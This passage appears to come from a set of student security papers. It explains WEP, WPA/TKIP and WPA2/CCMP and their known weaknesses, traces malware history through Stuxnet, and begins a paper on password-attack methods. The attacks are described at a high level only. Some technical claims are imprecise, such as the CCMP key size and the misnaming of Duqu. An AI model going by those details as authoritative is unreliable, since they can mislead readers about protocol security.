perform a long division algorithm. Divide the data after appended until it the
original part is fully divided. Record the remainder of the long division and
append this value to the original data as the checked data.
For example:
00011010101110 000
1001
00001000101110 000
1001
00000001101110 000
1001
00000000100110 000
1001
00000000000010 000
10 01
----------------00000000000000 010
<--<--<--<---
input left shifted by 3
divisor
result
divisor...
<---remainder (3 bits)
In this way, the new checked data of “00011010101110” becomes longer,
which is “00011010101110 010”. The last three bit is the check sum. In the
receiver side, they will also check it with the divisor 1001.
For example:
195
00011010101110 010
bits
1001
00001000101110 010
1001
00000001101110 010
1001
00000000100110 010
1001
00000000000010 010
10 01
----------------00000000000000 000
<--- input left shifted by 3
<--- divisor
<--- result
<--- divisor...
<---remainder (3 bits)
When the reminder becomes 0 in the receiver side, it means there is no error
during transmission.
2.2
Authentication Details:
Open system:
In Open System authentication, the client of the WLAN does not need to give
his/her passwords and username to the Access Point. As a result, all clients
are able to access to the Access Point without any authentication.
While the user access to the Access Point, authentication occurs. Users have
to enter the corresponding username and password into the system in order
to use the Access Point.
Shared key:
In Shared Key authentication, authentication takes place in form of question
and answers between server and client:
1. The client sends an authentication request to the Access Point.
2. The Access Point replies with a question.
3. The client encrypts the question with the configured WEP key, and sends it
back in another authentication request.
196
4. The Access Point decrypts the answer. If it matches the question, the
Access Point admits the connection and sends back a positive reply.
After the connection established, the pre-shared WEP key is also used for
encrypting the data frames using RC4. [4]
2.3
Evaluation:
Strength:
Major strength:
1. Previously, stream ciphers use linear feedback shift registers (LFSRs). Since
these registers are only efficient in the hardware part, the performance in
software section is not good enough. In contrast, the CR4 does not use
LFSRs. With simple byte manipulations, it provides good performance in
the software section. It uses 256 bytes of memory for the state array and k
bytes for the key. It use a bitwise AND operation with 255 to replace the
original modular reduction of some value modulo 256. [5]
2. Since RC4 is a stream cipher, it is better than the block cipher in terms of
preventing the BEAST attack on TLS 1.0. This is an important advantage
due to the methodology itself. For block cipher, since it is implemented
with fix length encryption, it is easy for the BEAST to accommodate and
steal the user information.[6]
Other strength:
1. The use of cyclic redundancy check is a cheap-to-implement and accurate
implementation. It can be easily implemented at the hardware level. Just
by simple bits manipulation, it can record the necessary data for error
detection, for example, to detect the error in noise channels.
Weakness:
Major flaws:
• RC4 does not take a separate nonce alongside the key. If multiple streams
are encrypted, the key shall be combined together with a specific
197
algorithm. However, RC4 normally does not have such an algorithm, it just
simply append the initialization vector to the key. Thus, by using the keys
of WEP concatenated with a 24-bit initialization vector (IV) as the key for
the RC4, it is not secure enough. At the same time, since the 24-bit IV is
fixed, which is too short, it is easy for the hackers to attack it. [7]
• Since RC4 is a stream cipher, the traffic keys are not supposed to be used
repeatedly. The use of IV is just to prevent the key to be duplicated.
However, the IV is not long enough. In a busy network, it is highly possible
that the same traffic key appear repeatedly. For a 24-bit IV, there is a 50%
probability the same IV will appear after each 5000 packets.
• In addition, because RC4 is a stream cipher, it is more malleable than
common block ciphers. It is vulnerable to a bit-flipping attack if it is not
used together with a strong message authentication code.
Actual events:
In August 2001, Scott Fluhrer, Itsik Mantin, and Adi Shamir (FMS)
published a cryptanalysis of WEP that exploits the way the RC4 cipher and
IV is used in WEP, resulting in a passive attack that can recover the RC4
key after eavesdropping on the network. Depending on the amount of
network traffic, and thus the number of packets available for inspection, a
successful key recovery could take as little as one minute. If an insufficient
number of packets are being sent, there are ways for an attacker to send
packets on the network and thereby stimulate reply packets which can
then be inspected to find the key. The attack was soon implemented, and
automated tools have since been released. It is possible to perform the
attack with a personal computer, off-the-shelf hardware and freely
available software such as aircrack-ng to crack any WEP key in minutes. [8]
FMS attack algorithm overview:
Step 1:
Start of KSA and IV is sent in clear text
K = IV|K-WEP.
Step 2:
198
Discover weak IVs such that KSA is resolved and output leaks information
about the key itself. With every weak IV found, guess 1 byte of K. The
average is 60 guesses per byte needed for recovering K.
Step 3:
When trying to recover K [A]:
SI[1] < I and SI[1] + SI[SI[1]] = I + A
After I steps results in resolved condition after I + A steps with high
probability.
Weak IV: (A+3, n-1, X). [8]
Other Flaws.
• In Generate RC4 keys:
The number of keys used for WEP is not long enough, for example WEP-40
with key length 40. In addition, these keys are normally used in terms of
ASCII code, which has less number of variations. Only a small percent of the
40 bit number have an ASCII representation. This makes the WEP more
unsecure.
• In cyclic redundancy check:
This algorithm is specifically designed to check the normal types of errors
occurred during communication channels. It itself is efficient, simple and
accurate. However, when there is an attack intentionally, the algorithm does
not protect the user from the attackers. It is easy to manipulate the data
such that they have the same cyclic redundancy check values or to
recalculate the check value to match the corrupted data frames. [9]
• In authentication phase:
The share-key authentication is less secure than the open system. Even
though it provides the identification check as long as the client wants to
connect with the Access Point, the key streams may be easily captured by
the third party during this handshake process. As a result, it is better to use
199
open authentication rather than the share-key authentication although the
open system authentication is also a weak authentication method.
2.4
Minor Modifications
WEP2:
Due the fact that the initialization vector is so short that is it easier to launch
a stream cipher attack, WEP2 extended both the length of the IV key and the
key of itself to 128 bits, compared to 24 bits and 40 bits in the previous
version of WEP. In this way, the extended keys make a longer key for RC4.
[10]
In so doing, the WEP2 helps to eliminate the duplicate IV deficiency and stop
brute force key attack to some extent.
At the same time, since the keys become longer, the amount of possible
ASCII combinations are also become more. However, just as the previous
version, the ASCII combinations are still a small fraction of the bit
combination of the key. Lots of them are wasted in this way.
WEP+:
Some of the plaintext initialization vectors statistically lead the pre-shared
keys. They IVs are referred to the weak IVs. WEP+ filters out the weak IVs so
that there are no more weak IVs that can be used by the attackers to crack
the WEP+. [11]
However, this implementation works only when both the ends of the
wireless connection. This can hardly be enforced. At the same time, the
WEP+ only solves this particular statistical flaw in the encryption process.
Other statistical flaws still exist with WEP+.
3
Wi-Fi Protected Access (WPA)
Since the Wired Equivalent Privacy (WEP) has various serious weaknesses
[12], the Wi-Fi Alliance designed security certification programs and two
security protocols to replace the older security algorithm, Wired Equivalent
200
Privacy (WEP), used for IEEE 802.11 wireless networks. The first security
protocol, Wi-Fi Protected Access (WPA), was intended as an intermediate
measure to replace the WEP. WPA has implemented the majority of the
IEEE802.11i standard. The Temporal Key Integrity Protocol (TKIP) is also
included in WPA to replace the old 40-bit or 128-bit encryption key which
used in WEP that must be manually entered on wireless access points and
devices and does not change [13].
3.1
Temporal Key Integrity Protocol (TKIP)
Background:
As a security protocol used in the IEEE 802.11 wireless networking standard,
TKIP is designed by the IEEE802.11i task group and Wi-Fi Alliance as a
solution to replace WEP without upgrading of the legacy hardware are left by
the Wi-Fi networks without viable link-layer security [14].
Mechanisms:
TKIP and the related WPA standard, implement three new security features
to address security problems encountered in WEP protected networks:
• Firstly, a key mixing function that combines the secret root key with
the initialization vector before passing it to the RC4 initialization is
implemented in the TKIP.
• WEP, in comparison, merely concatenated the initialization vector to the
root key, and passed this value to the RC4 routine which permitted the
vast majority of the RC4 based WEP related key attacks [15].
• Secondly, a sequence counter is implemented to protect against replay
attacks. The access point will reject the packets that are received out of
order.
• Finally, a 64-bit Message Integrity Check (MIC) is implemented in the TKIP
[16].
TKIP uses RC4 as its cipher in order to be able run on legacy WEP hardware
with minor upgrades. It also provides a rekeying mechanism and ensures
that every data packet is sent with a unique encryption key.
201
3.2
Message Integrity Check:
• In order to prevent an attacker from capturing, altering and/or resending
data packets, a message integrity check (MIC) has been included inside the
WPA.
• The cyclic redundancy check (CRC) in WEP standard has been replaced by
the MIC and it provides a strong data integrity guarantee for the handled
packets than the CRC with the usage of the Integrity Check Value (ICV)[17].
• MIC with another identification term message authentication code (MAC)
is the information used to authenticate a message [18].
• The algorithm of MIC (or keyed hash function), uses a secret key with an
arbitrary-length message for the purpose of authentication. This protects
the integrity and the authenticity of the message’s data, by allowing
verifiers to detect the changes in the message content.
• The cryptographic primitives, such as cryptographic hash function or block
cipher algorithms can be used to construct the MIC or MAC algorithms.
However many of the fastest MAC algorithms such as UMAC and VMAC
are constructed based on universal hashing [19].
202
MAC Example:
In this example, the sender of a message runs it through a MAC algorithm to
produce a MAC data tag. The message and the MAC tag are then sent to the
receiver. The receiver in turn runs the message portion of the transmission
through the same MAC algorithm using the same key, producing a second
MAC data tag. The receiver then compares the first MAC tag received in the
transmission to the second generated MAC tag. If they are identical, the
receiver can safely assume that the integrity of the message was not
compromised, and the message was not altered or tampered with during
transmission [20].
3.3
Strength:
• With the new features that implemented in TKIP, WPA will be more secure
than WEP since the key mixing inside the TKIP increases the complexity of
decoding the keys by giving an attacker substantially less data that has
203
been encrypted using any one key. As such, the WEP key recovery attacks
has been eliminated.
• Many existing attacks are discouraged by the message integrity check
(MIC), broadcast key rotation, per-packet key hashing and a sequence
counter.
As a result, TKIP raise the difficulty for many attacks so that make the
wireless networks with WPA protocol more secure than the wireless
networks with WEP protocol.
3.4
Weaknesses:
Since TKIP uses the same underlying mechanism as WEP, it is consequently
vulnerable to a number of similar attacks. Furthermore, due to the changes
in the algorithm of the protocol, the weakness of some of the additions leads
to new attacks including the Beck-Tews attack and Ohigashi-Morii attack.
Beck-Tews attack:
─ Beck-Tews attack is a key-stream recovery attack that, if successfully
executed, permits an attacker to transmit 7-15 packets of the attacker’s
choice on the network [21].
─ It is an extension of the WEP chop-chop attack which is that when an
attacker guess individual bytes of a packet, if it is correct confirmed by
the wireless access point, the attacker will be able to continue to guess
other bytes of the packet.
─ In addition, the attack is able to avoid the countermeasures from the
checksum mechanism and the message integrity check (MIC) so that the
attacker is able to access the key-stream of the packet and the MIC
code session.
─ The attack can also circumvent the WPA implemented replay protection
by using the utilized Quality of Service (QoS) channels.
─ As such, it will lead to attacks including ARP poisoning attacks, denial of
service, and other similar attacks.
204
e.g. In October 2009, Halvorsen with others made a further progress,
enabling attackers to inject a larger malicious packet (596 bytes, to be more
specific) within 18 minutes and 25 seconds [22].
Ohigashi-Morii attack:
• Japanese researchers Toshihiro Ohigashi and Masakatu Morii reported the
attack which is built on the Beck-Tews attack [23].
• The Ohigashi-Morii attack utilizes the similar attack method, but uses a
man-in-the-middle attack and does not require the vulnerable access
point to have Quality of Service (QoS) enabled.
4
Wi-Fi Protected Access II (WPA2)
WPA2, also known as IEEE 802.11i-2004, is the successor of WPA. It is used
to replace the intermediate solution WPA to the old used protocol WEP. All
the mandatory elements of IEEE 802.11i have been implemented in WPA2
and a new Advanced Encryption Standard (AES)-based encryption mode,
CCMP, has been used to replace the TKIP used in WPA in order to provide
additional security [24].
5
5.1
Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol or CCMP (CCM mode Protocol)
Background
• As an encryption protocol designed for Wireless LAN products, CCMP
implements the standards of the IEEE802.11i which is the amendment to
the original IEEE802.11 standard.
• CCMP is an enhanced data cryptographic encapsulation mechanism
designed for data confidentiality and based upon the Counter Mode with
CBC-MAC (CCM) of the AES standard [25].
• As the successor, CCMP is created to handle the vulnerabilities from TKIP
in order to make the wireless network more secure [25].
205
5.2
Mechanisms:
• For data confidentiality, CCMP uses CCM that combines CTR whereas for
authentication and integrity, CCMP uses CCM that combines CBC-MAC.
• Both of the MPDU data field and selected portions of the IEEE802.11
Medium Access Control Protocol Data Unit (MPDU) header are protected
by CCM.
• CCMP is based on AES processing and uses a 128-bit key and a 128-bit
block size and uses CCM with the following two parameters:’
─ M = 8; indicating that the MIC is 8 octets.
─ L = 2; indicating that the Length field is 2 octets [26].
• ACCMP MPDU includes five sections:
─ The MAC header which contains the destination and source address of
the data packet.
─ The CCMP header which is composed of 8 octets and consists of the
packet number (PN), the Ext IV, and the key ID.
─ The CCMP uses all the values of PN, Ext IV and ID to encrypt the data
unit and the MIC.
─ The data unit which is the data being sent in the packet.
─ The Message Integrity Code (MIC) which protects the integrity and
authenticity of the packet and the frame check sequence (FCS) which is
used for error detection and correction [25].
5.3
Strength:
• As the standard encryption protocol used in WPA2 standard, CCMP is
much more secure than the TKIP protocol and WEP protocol of WPA.
• For data confidentiality, CCMP ensures only authorized parties can access
the information [16].
• For authentication, CCMP provides proof of genuineness of the user [27].
• CCMP also provides access control in conjunction with layer management
[27].
• Due to the block cipher mode, CCMP is secure against attacks to the 2^128
steps of operation if the key for encryption is 256 bits or larger.
206
• As a result, CCMP handles a lot of weaknesses which are encountered in
WPA and WEP.
5.4
Weaknesses:
• The strength of the key has been limited to 2^ (n/2) (n: number of bits in
the key) operations needed due to the existence of the generic meet-inthe-middle attacks [26].
6
Conclusions:
Every protocol has its strength and weakness. It is because there is always a
trade-off between simplicity and performance. As shown from the above
examples, those mechanism that are cheap to implement always have some
server problems which caused by intentional attracters. At the same time,
the increase of complexity, for example the WEP case, increases the security
level of the protocol, which makes the attacking process far more
complicated.
After evaluating the strength and weakness of each protocol, a trend is
clearly shown. Those newly invented protocols always have less weakness,
compared to those that are replaced over. Nevertheless, it is not the
situation where the newly invented protocols have indeed less weakness,
but the fact that those weakness have not yet discovered. Just before the
invention of WPA, WEP is overly welcomed and critiqued positively with little
weakness. As a result, as long as the core weakness of a protocol is not
discovered, it can be used widely. In contrast, a new protocol with higher
complexity has to be invented.
207
7
References:
1. Lars R. Knudsen and John Erik Mathiassen, 2004, On the Role of Key
Schedules in Attacks on Iterated Ciphers
2. Arvind
Doraiswamy,
2006,
Palisade,
http://palisade.plynt.com/issues/2006Dec/wep-encryption/
3. Peterson, W. W. and Brown, D. T, Jan 1961, Cyclic Codes for Error
Detection
4. Nikita Borisov, Ian Goldberg, David Wagner, 12 Sep 2006, Intercepting
Mobile Communications: The Insecurity of 802.11.
5. Maria George and Peter Alfke, 30 Apr 2007, Linear Feedback Shift
Registers
in
Virtex
Device,
http://www.xilinx.com/support/documentation/application_notes/xapp2
10.pdf
6. Ivan Ristic, 18 Oct 2008, Net Security, http://www.netsecurity.org/article.php?id=1638
7. Seth Fogie, 16 Mar 2008, WPA Part2: Weak IVs, inform IT,
http://www.informit.com/guides/content.aspx?g=security&seqNum=85
8. Scott Fluhrer, Itsik Mantin, and Adi Shamir, 2001, Weaknesses in the Key
Scheduling Algorithm of RC4
9. Cam-Winget, Nancy; R. Housley, Russ; D. Wagner, David; J. Walker, Jesse ,
May 2003, Security Flaws in 802.11 Data Link Protocols
10.
Thom Stark, Mar 2008, WEP2, Credibility Zero, starkrealities.com
11.
Business Wire, 2001, Agree Systems is First to Solve Wireless LAN
Wired
Equivalent
Privacy
Security
Issue
http://findarticles.com/p/articles/mi_m0EIN/is_2001_Nov_12/ai_799542
13/?tag=content;col1
12.
Kevin Beaver, 10 Jan 2010, Understanding WEP weakness, Wiley
Publishing.
http://www.dummies.com/how-to/content/understandingwep-weaknesses.html
13.
Meyers, Mike, 2004, Managing and Troubleshooting Networks.
Network+. McGraw Hill. ISBN 978-0-07-225665-9
14.
Bradley Mitchell, 21 Aug 2008, AES vs TKIP for Wireless Encryption,
http://compnetworking.about.com/b/2008/08/21/aes-vs-tkip-forwireless-encryption.htm
208
15.
Edney, Jon; Arbaugh, William A, 15 Jul 2003, Real 802.11 Securities:
Wi-Fi Protected Access and 802.11i. Addison Wesley Professional.
16.
IEEE-SA Standards Board. Wireless LAN Medium Access Control (MAC)
and Physical Layer (PHY) Specifications. Communications Magazine, IEEE,
2007.
17.
Ciampa, Mark, 2006, CWNA Guide to Wireless LANS. Networking.
Thomson.
18.
IEEE standards association, 12 June 2007, IEEE 802.11, Wireless LAN
Medium Access Control (MAC) and Physical Layer (PHY) Specifications.
19.
Wei Dai, April 2007, VMAC: Message Authentication Code using
Universal Hashing, CFRG Working Group
20.
Wi-Fi
Protected
Acces,
4
Nov
2011,
http://en.wikipedia.org/wiki/Message_authentication_code
21.
Martin Beck & Erik Tews, Practical attacks against WEP and WPA,
athttp://dl.aircrack-ng.org/breakingwepandwpa.pdf
22.
Vivek-Ramachandran , 25 May 2011, Wireless Lan Security
Megaprimer
Part
23:
Wpa2-Psk
Cracking,
http://www.securitytube.net/video/1911
23.
Toshihiro Ohigashi and Masakatu Morii , A Practical Message
Falsi_cation
Attack
on
WPA,
http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message
%20Falsification%20Attack%20on%20WPA.pdf
24.
Jonsson, Jakob, 15 May 2010, On the Security of CTR + CBC-MAC,
http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/c
cm/ccm-ad1.pdf
25.
Cole, Terry, 12 June 2007, IEEE Std 802.11-2007, New York: The
Institute
of
Electrical
and
Electronics
Engineers,
http://standards.ieee.org/getieee802/download/802.11-2007.pdf
26.
Whiting, Doug; Hifn, R. Housley, Vigil Security, N. Ferguson,
MacFergus,
Sep
2003,
Counter
with
CBC-MAC
(CCM),
http://tools.ietf.org/html/rfc3610
27.
Ciampa, Mark, 2009, Security Guide to Network Security
Fundamentals 3-ed Boston, MA: Course Technology. pp. 205, 380, 381
209
210
Malicious Software:
From Neumann’s Theory of Self-Replicating
Software to World’s First Cyber Weapon
Kaarel Nummert
School of Computing, National University of Singapore,
21 Lower Kent Ridge Road, Singapore 119077
[email protected]
Abstract. When John von Neumann was giving his lectures about the
theory of self-replicating programs only science fiction authors could have
imagined how rapidly the technology of malware would develop and that
60 years after his lectures this theory would be used to created a weapon
to sabotage Iran’s nuclear program.
1
1.1
Introduction
Motivation
Motivation for this project came from an essay “The Growing Harm of Not
Teaching Malware” by George Ledin. Professor Ledin explains how current computer science students’ knowledge of malware is roughly on a par with that of
the general population of amateur computer users”. This project is an attempt
to change that.
1.2
What is Malware?
The term malware, short for malicious software, is used to describe software that
has hidden, hostile, intrusive or annoying functionality. Based on its functionality
and purpose malware is often categorized into computer viruses, worms, trojan
hourses, spyware, adware, scareware, crimeware and rootkits.
2
History of Malware
Although the work on computer viruses in academia began already in 1949
with John von Neumann’s lectures on “Theory and Organization of Complicated
Automata”, where he discussed self-replicating programs, it was not until 1970s
when the first computer viruses were written and spread in the public.
211
2.1
Pervading Animal
In January 1975, John Walker created a game called ANIMAL, which contained
a subroutine PERVADE. The game itself would as player to askwer 20 questions
about the animal he is thinking about, and then try to guess which animal it is.
While user is answering the questions PERVADE subroutine would go through
every directory accessible by the user and copy the latest version of ANIMAL into
it. ANIMAL was written for UNIVAC 1108 series mainframes, and it represents
the first trojan horse in the history of computers.[6]
2.2
Brain
The first computer virus to infect PC computers was written in January 1986
in Pakistan. It was named Brain after the company it was written by - Brain
Computer Services. Surprisingly, the contact details of theauthors of Brain were
included in the source code. Since internet as we know it today, did not yet
exist, the virus spread via floppy discs. Despite the seemingly inefficient method
of spreading, it actually reached all over the world as one of the first calls authors
of the virus received was from Miami University. Brain infected boot sector of
floppy discs formatted with DOS FAT file system. Although purpose of the
virus was to experiment with the security of MS-DOS and it did not contain
any destructive behaviour, once the virus spread to a large number of computers
in United Kingdom and United States, the authors of the virus were forced to
close the phone numbers revealed in the virus due to an overwhelming amount
of phone calls.[8]
2.3
Jerusalem Virus
While ANIMAL and Brain were non-destructive viruses, Jerusalem Virus detected in city of Jerusalem in October 1987 would destroy all executable files
upon every occurance of Friday 13th. Jerusalem Virus is known as the first computer virus that caused deliberate harm to the infected system and it caused
a worldwide epidemic in 1988 when the first trigger date of May 13th, 1988
occurred.
2.4
Viruses Become Multipartite and Polymorphic
In October 1989, Icelander Fridrik Skulason discovered Ghostball which carried
out several damaging action on the infected system, making it the first multipartite virus. In 1990, Mark Washburn and Ralf Burger developed the Chameleon
family - the first family of polymorphic viruses. Polymorphic viruses mutate
themselves while maintaining the original algorithm, making themselves more
difficult to discover by anti-virus software. The first widespread polymorphic
virus found outside labarotories was Tequila, found in 1991.
212
2.5
Rootkits
In 1990 Lane Davis and Steven Dake wrote the first rootkit. Rootkit was initially
named after its purpose to provide priviliged (”root”) access on UNIX operating
system, but since rootkits were soon created for Microsoft Windows and Mac OS
X operating systems, the term now stands for malware that provides continuous
priviliged access for an attacker to the infected system.[2]
2.6
Melissa
Discovered on March 26, 1999, Melissa was the first mass-mailing macro virus.
Despite not originally being designed for harm, it shut down several Internet
mailing systems that couldn’t handle the load of e-mails send by the virus to
propagate itself. Melissa was not a standalone program, but part of Microsoft
Office documents and spreadsheets that used user’s contact list in Microsoft
Outlook to send itself to new victims. Melissa was written by David Smith, who
was initially sentenced to 10 years but only served 20 months in a federal prison
and was fined $5,000.[7]
2.7
StormWorm
StormWorm was an emailer worm that utilized social engineering of the addressee from one’s trusted contacts using attached binaries or malicious code
hidden into Microsoft Office attachments. Once the these reached victim’s system they launched well-known client-side attacks on Microsft Internet Explorer
and Microsoft Office. StormWorm is a peer-to-peer botnet framework and backdoor Trojan horse that affects computers that use Microsoft Windows. Discovered on January 17th in 2007, StormWorm uses decentralized command and
control technique to increase its chances of surviving, because there is no central
point of control. Each infected machine knows 25 to 50 other ones, and therefore it is hard to track down all infected machines. Hence, StormWorm’s size
was never calculated, butis estimated to have been ranging from 1 - 10 million
victim systems, being the single largest botnet herd in history.[1]
2.8
Stuxnet
Stuxnet is considered to be the most important malware in history. It was discovered in June 2010 and was the first malware that spies on industrial systems
and first to include a programmable logic controller (PLC) rootkit. What makes
it even more significant is its level of sophistication and its target. It used an unprecedented four zero-day (unknown to software developer) attacks of Windows
systems, parts of it were digitally signed, an equivalent testing facility of the
final target was used to test the code during development, and it was targeted
to compromise Iran nuclear enrichment plants, which it likely succeeded in.
213
3
Case Study: Stuxnet
Stuxnet was not an evolution in world of malware, but a revolution and the
world’s first real cyber weapon.
3.1
Possible Attack Scenario
Since the targets of Stuxnet were industrial control systems (ICS) operated by
specialized assembly like code on programmable logic controllers (PCL), and
each PLC is configured in a unique manner, the attackers must have had the
ICS’s schematics. These were possibly obtained by another malware or an insider
in the final target organization.
Analysis done on Stuxnet show that it was carefully tailored for a specific ICS.
Researchers in Symantec believe attackers must have had a mirrored environment based on the obtained schematics that included ICS hardware, PLCs, modules and peripherals to test their work on.
The malicious binaries of Stuxnet contained driver files that were digitally signed
by two companies. The certificates for that were probably stolen by physically
entering the premises of these companies, as the two companies are in close physical proximity.
Attackers behind Stuxnet targeted five organizations in Iran that they believed
would help them reach their final target. Each of these initial targets were attacked in a separate attack between June 2009 and June 2010. From these organizations Stuxnet spread on to other organizations on its way to its final target,
nuclear enrichment facility in Iran.
Researchers in Symantec claim that the shortest time between compilation of
Stuxnet and attacking a system with the compiled result was just 12 hours. The
fact that Stuxnet was not designed to spread via internet but via an infected
USB memory stick or via local network suggests that attackers must have had
immediate access to one of the initial targets.
So far researchers have managed to find three variants of Stuxnet, but they
believe there is a fourth variant. One of the initial target organizations was attacked with alll three variants, suggesting attackers believed it to be a crucial
step on their way to the final target.[3]
3.2
Discovering Stuxnet
Normally, Iran replaced up to 10 percent of its uranium enriching centrifuges.
In Natanz, the plant attacked by Stuxnet (as later discover), it would have been
normal to decomission about 800 per year. In early 2010, as International Atomic
214
Energy Agency discovered, Natanz had to replace between 1,000 and 2,000 centrifuges in a few months. Although Iran was not required to explain the reason
for replacing the abnormal amount of centrifuges, it was clear something had
damaged the centrifuges.
On June 17, 2010, Sergey Ulasen, head of computer security firm VirusBlokAda
in Belarus, received a report from a customer in Iran whose computer was in
a reboot loop. VirusBlokAda got hold of the virus in customer’s computer and
quickly realized it was using a zero-day exploit in Windows Explorer to spread.
The exploid allowed the virus use infected USB sticks to spread. On July 12,
VirusBlokAda reported the exploit along with the virus to Microsoft. In a few
days, Microsoft named the virus Stuxnet from combination of files found in the
code (.stub and MrxNet.sys).
As computer security researchers started reverse engineering and analyzing the
virus, it came clear the virus had been released up to one year before it was
discovered, and that it had been refined several times over time. Stuxnet was
also discovered to use two digital certificates issued by two different companies in
Taiwan: RealTek Semiconductor and JMicron Technology, both headquartered
in a same business park in Taiwan.
Despite the use of a zero-day exploit (only a few viruses out of millions use
one) and stolen certificates, Stuxnet seemed rather harmless. Exprets determined that Stuxnet was designed to target Simatic WinCC Step7 software, an
industrial control system by Siemens used to program controllers that drive motors, valves and switches various plants.
Once Stuxnet was released to computer security organizations and Nicolas Falliere, Liam O Murchu and Eric Chien, researchers in Symantec, discovered the
actual sophistication of Stuxnet. Stuxnet stored its decrypted malicious DLL
files in memory only to avoid detection by antivirus software. To access these
virtual DLL files Stuxnet then reprogrammed Windows API. That technique
was never seen before.
The researchers also discovered, that Stuxnet was using not one but four zero-day
expoits, and that is was programmed to report a detailed description of every
infected system and update the malicious software if needed. By eavesdropping
on that traffic researchers were able to determine that majority of the infected
machines were located in Iran, making it clear Iran was the centre of infection.
Further investigation revealed that once Stuxnet determined a system had Siemens
Step7 software, it would replace the original commands of Step7 and disable any
automated alarms that might go off as a result of malicious commands. It also
masked what was happening on the PLC by intercepting status reports sent
from the PLC to the Step7 machine, and removing any sign of the malicious
215
commands.
Finally, once Symantec researchers released their findings, a German computer
security expert Ralph Langner discovered that Stuxnet was not aimlessly sabotaging PLCs, but would only attack one matching a very specific configuration.
It was now when the Stuxnet discoveries started to point towards the Natanz
uranium enrichment plant described earlier.[5]
3.3
Dugu
In October 2011, computer security researchers came across a new backdoor
known as Dugu. It was created by someone who had access to the source code
of Stuxnet, most probably the same party that created Stuxnet because source
code of Stuxnet has not been released, researchers and antivirus organizations
only have the binaries. Unlike Stuxnet, Dugu is not targeting PCLs. Instead
it collects various information about the infected system to be used for future
attacks, making it a precursor for future Stuxnet-like attacks. Similarities with
Stuxnet are more than obvious: both viruses share a similar driver and similarly
to Stuxnet Dugu’s driver is signed by a stolen certificate issued by a Taiwan
company. While Stuxnet was designed to function no longer than June 24, 2012,
Dugu is reportedly designed to remove itself 36 days after infection.[4]
3.4
Aftermath
Although more than 100,000 computers in Iran, Europe and United States have
been found to be infected by Stuxnet, the actual attack was only conducted
when suitable PLCs were found on the system. Although Stuxnet did not attack
systems on its way to the final target, it chose to keep a copy of itself to be
able to communicate possible updates to the final target, as it was isolated from
untrusted networks.[3]
It is likely that Stuxnet succeeded in completing its initial attack, but would
Stuxnet have removed itself from the non-targeted systems while they were no
longer needed, maybe it would have never been discovered.
Stuxnet has started a new era in the history of malware, and one can only
hope that in another 35 years it will not be looked back as a trivial virus the
same was ANIMAL PREVADER is today.
216
References
1. Davis, M.A., Bodmer, S.M., LeMasters, A.:
Hacking ExposedTM Malware & Rootkits: Malware & Rootkits Secrets and Solutions
The McGwar-Hill Companies (2010)
2. Aycock, J.:
Computer Viruses and Malware
Sringer Sciende+Business Media, LLC (2006)
3. Falliere, N., O Murchu, L., Chie, E.:
W32.Stuxnet Dossier
Symantec Security Response (February 2011)
4. W32.Dugu: The precursor to the next Stuxnet
Symantec Security Response (November 2011)
5. http://www.wired.com/threatlevel/2011/07/how-digital-detectives-decipheredstuxnet/all/1
6. http://www.fourmilab.ch/documents/univac/animal.html
7. http://en.wikipedia.org/wiki/Melissa (computer virus)
8. http://campaigns.f-secure.com/brain/virus.html
217
218
Password Authentication for Web Applications
Shi Hua Tan, Wen Jie Ea, Rudyanna Tan
Abstract. Web applications are vulnerable to a whole array of attacks when the
applications are insecure. This gives rise to threats to both the server and client.
In this paper, we explore the vulnerability of web applications based on the 5
most common attacks on web applications, especially the threats of
authentication hacking, highlighting the possible methods an attacker might
utilize. Our focus would be the analysis of different possible methods of
securing a web application using the different methods of password
authentication. Finally, we give an evaluation of the various methods discussed,
offering suggestions of password authentication for web developers to employ.
Keywords: Password authentication, Web application security
1 Introduction
With vulnerabilities in web applications, there exists the need for security to protect
one’s sensitive data and improve one’s security posture. If the site is vulnerable, the
attacker could break into the system by proving to the application that he/she is a
known and valid user, and then the attacker can gain access to whatever privileges the
administrator assigned to that user. Hence, if the attacker manages to enter as an
administrative user with global access on the system, he/she would have almost total
control on the application together with its content.
1.1 Threats to Web Applications
Web applications offer services such as mail services, online shops, or database
administration, which increase the exposed surface area by which a system can be
exploited. Web applications, by their nature, are often widely accessible to the
Internet which means that there are a very large number of potential attackers. These
factors caused web applications to become a very attractive target for attackers,
leading to numerous attack methods. In this paper, authentication hacking will
discussed in detail.
1.2 Authentication Hacking – What is it?
In general, an attacker first tries to gain access to the login screen where the
application would request a login and password. Next, he/she would need to enter a
correct match of login and password that the application would recognize as correct
219
and which has high privileges in the system, in order to gain access into the system.
Among attacks, password guessing is often one of the most effective techniques to
defeat web authentication. It can be carried out either manually or via automated
procedures.
1.3 Authentication Hacking – Possible Procedures
Network Sniffing. Network sniffing uses specialized hardware and software to access
information that is not being sent to someone or analyze networks to which
individuals do not have legitimate access [7]. After information is sent over a
network, it is broken up into packets which contain a small amount of the
information, the addresses of the receiver and sender and some technical data.
Specialized hardware or software can intercept and copy these packets. By analyzing
the addresses and packet information, a person can learn about the internal network
hardware and specific addresses which may highlight security vulnerability or a
previously unknown method of entering the network. Information theft could arise as
the packets contain a small amount of information which is lightly encoded and thus
unsecured. People can open the packets and search through the data for important
information.
Malicious or Weak Security Websites.
Phishing. A phishing scam is an identity theft scam via email. The email appears to
come from a legitimate source such as a trusted business or financial institution, and
includes an urgent request for personal information such as invoking critical need to
update an account immediately [6]. Clicking on the link provided in the email leads to
an official-looking website. However, personal information provided to the site goes
to the scam artist directly. People are tricked into providing personal information
including credit card numbers, passwords, bank account numbers, ATM pass codes
and individual’s identity numbers. Virus protectors and firewalls do not catch these
phishing scams as they do not contain any suspicious code, while spam filters let them
pass because they appears to come from legitimate sources.
Brute Force Attack. A brute force attack is a trial-and-error attack which involves
cracking a password by trying every possible password to access encrypted data or
accounts without the authorization to do so [4]. A program could be used to enter all
of the possible password combinations such as letter combinations, number
combinations and letter-and-number combinations, one by one, until the correct
combination is found. This method of cracking codes can be difficult, but is not
impossible. Its success depends on the length of the password and the values that may
be included as part of it. However, the success rate may be reduced if the account has
security measures that lock the account once an incorrect password has been entered a
particular number of times.
220
Dictionary Attack. A dictionary attack is an attempt to literally use every word in the
dictionary as a means of identifying the password associated with an encrypted data
or accounts [5]. In order to increase the potential for success, hackers will attempt to
utilize as many words as possible when planning a dictionary attack. The words can
come from a traditional dictionary, various types of technical or industry related
dictionaries and glossaries, including dictionaries in different languages to increase
